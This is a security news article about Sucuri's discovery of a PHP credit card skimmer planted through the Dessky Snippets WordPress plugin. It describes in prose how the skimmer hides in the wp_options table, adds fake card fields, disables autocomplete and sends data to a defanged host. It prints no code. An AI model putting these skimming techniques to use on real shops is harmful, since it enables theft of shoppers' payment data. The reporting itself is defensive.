Unknown threat actors are utilizing lesser-known code snippet plugins for WordPress to put malicious PHP code on victim sites that are capable of capturing credit card data.
The campaign, detected by Sucuri on May 11, 2024, comprises the misuse of a WordPress plugin called Dessky Snippets, which allows users to write custom PHP code. It has around 200 active installations.
Such attacks are known to utilize previously published flaws in WordPress plugins or easily guessable credentials to get administrator access and install other plugins (legal or otherwise) for post-exploitation.
Sucuri stated the Dessky Snippets plugin is used to implant a server-side PHP credit card skimmer malware on vulnerable sites and collect financial data.
"This malicious code was saved in the dnsp_settings option in the WordPress wp_options table and was designed to modify the checkout process in WooCommerce by manipulating the billing form and injecting its own code," security researcher Ben Martin stated.
Specifically, it's meant to add numerous extra fields to the billing form that seek credit card details, including names, addresses, credit card numbers, expiration dates, and Card Verification Value (CVV) numbers, which are subsequently exfiltrated to the URL "hxxps://2of[.]cc/wp-content/."
A noteworthy component of the campaign is that the billing form connected with the bogus overlay has its autocomplete property disabled (i.e., autocomplete="off").
"By manually disabling this feature on the fake checkout form it reduces the likelihood that the browser will warn the user that sensitive information is being entered, and ensures that the fields stay blank until manually filled out by the user, reducing suspicion and making the fields appear as regular, necessary inputs for the transaction," Martin said.
This is not the first time threat actors have resorted to utilizing respectable code snippet plugins for harmful reasons. Last month, the company identified the usage of WPCode code snippet plugin to inject malicious JavaScript code into WordPress sites in order to reroute site users to VexTrio domains.
Another malware operation named Sign1 has been revealed to have infected over 39,000 WordPress sites in the last six months by exploiting malicious JavaScript injections via the Simple Custom CSS and JS plugin to lead users to fraudulent sites.
WordPress site owners, particularly those offering e-commerce functions, are encouraged to maintain their sites and plugins up-to-date, use strong passwords to prevent brute-force assaults, and routinely audit the sites for signs of malware or any unauthorized changes.